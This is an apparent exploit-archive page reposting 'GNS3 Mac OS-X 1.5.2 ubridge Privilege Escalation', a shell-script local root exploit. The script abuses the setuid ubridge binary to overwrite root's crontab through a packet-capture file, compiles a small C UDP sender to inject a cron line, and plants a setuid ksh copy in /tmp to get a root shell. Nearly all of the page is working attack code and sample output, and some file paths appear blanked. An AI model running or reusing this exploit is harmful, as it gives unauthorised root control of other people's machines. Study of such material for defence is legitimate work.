GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation
来源 作者:Fantastic 发布时间:2017-04-13
#!/bin/sh # GNS-3 Mac OS-X LPE local root exploit # ===================================== # GNS-3 on OS-X bundles the "ubridge" binary as a setuid # root file. This file can be used to read arbitary files # using "-f" arguement but also as it runs as root can also # write arbitrary files with "pcap_file" arguement within # configuration ini file. It is possible to abuse this utility # to also write arbitary contents by bridging a UDP tunnel # and writing to disk. We can exploit these mishaps to gain # root privileges on a host that has GNS-3 installed by # writing a malicious crontab entry and escalating privileges. # This exploit takes advantage of this flaw to overwrite # root crontab with our own entry and to spawn a root shell. # Don't forget to clean up in /usr/lib/spool/tabs and /tmp # after running. Tested on GNS-3 version 1.5.2. The root user # must have a crontab installed (even an empty one set with # crontab -e) or the box rebooted after first attempt to get # commands to execute with this cron method. # # $ ./ # [+] GNS-3 Mac OS-X local root LPE exploit 0day # [-] creating ubridge.ini file... # [-] Launching ubridge.. # [-] Preparing cron script... # Parsing prdelka # Creating UDP tunnel 40000: # Creating UDP tunnel 50000: # Starting packet capture to /usr/lib/cron/tabs/root with protocol (null) # unknown link type (null), assuming Ethernet. # Capturing to file '/usr/lib/cron/tabs/root' # Source NIO listener thread for prdelka has started # Destination NIO listener thread for prdelka has started # [-] making magic packet client... # [-] packet fired # [-] Waiting a minute for the exploit magic... # -rwsr-xr-x 1 root wheel 1377872 Apr 12 23:32 /tmp/pdkhax # [-] Got Root? # # id # uid=501(hackerfantastic) gid=20(staff) euid=0(root) # # -- Hacker Fantastic ( echo "[+] GNS-3 Mac OS-X local root LPE exploit 0day" echo "[-] creating ubridge.ini file..." cat > ubridge.ini << EOF [prdelka] source_udp = 40000: destination_udp = 50000: pcap_file = "/usr/lib/cron/tabs/root" EOF echo "[-] Launching ubridge.." /Applications/ & echo "[-] Preparing cron script..." cat > /tmp/ << EOF cp /bin/ksh /tmp/pdkhax chown 0:0 /tmp/pdkhax chmod 4755 /tmp/pdkhax EOF chmod 755 /tmp/ echo "[-] making magic packet client..." cat > udphax.c << EOF #include <stdio.h> #include <string.h> #include <stdlib.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/types.h> int main(int argc, char* argv[]) { struct sockaddr_in si_other, srcaddr; int s, i, slen=sizeof(si_other); char* pkt = "\n* * * * * /tmp/\n\n"; s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); memset((char *) &si_other, 0, sizeof(si_other)); si_other.sin_family = AF_INET; si_other.sin_port = htons(50000); inet_aton("", &si_other.sin_addr); srcaddr.sin_family = AF_INET; srcaddr.sin_addr.s_addr = htonl(INADDR_ANY); srcaddr.sin_port = htons(50001); bind(s,(struct sockaddr *) &srcaddr, sizeof(srcaddr)); sendto(s,pkt,strlen(pkt),0,(struct sockaddr *)&si_other, slen); printf("[-] packet fired\n"); } EOF gcc udphax.c -o udphax ./udphax echo "[-] Waiting a minute for the exploit magic..." rm -rf udphax* ubridge.ini pkill ubridge sleep 60 rm -rf /tmp/ ls -al /tmp/pdkhax echo "[-] Got Root?" /tmp/pdkhax
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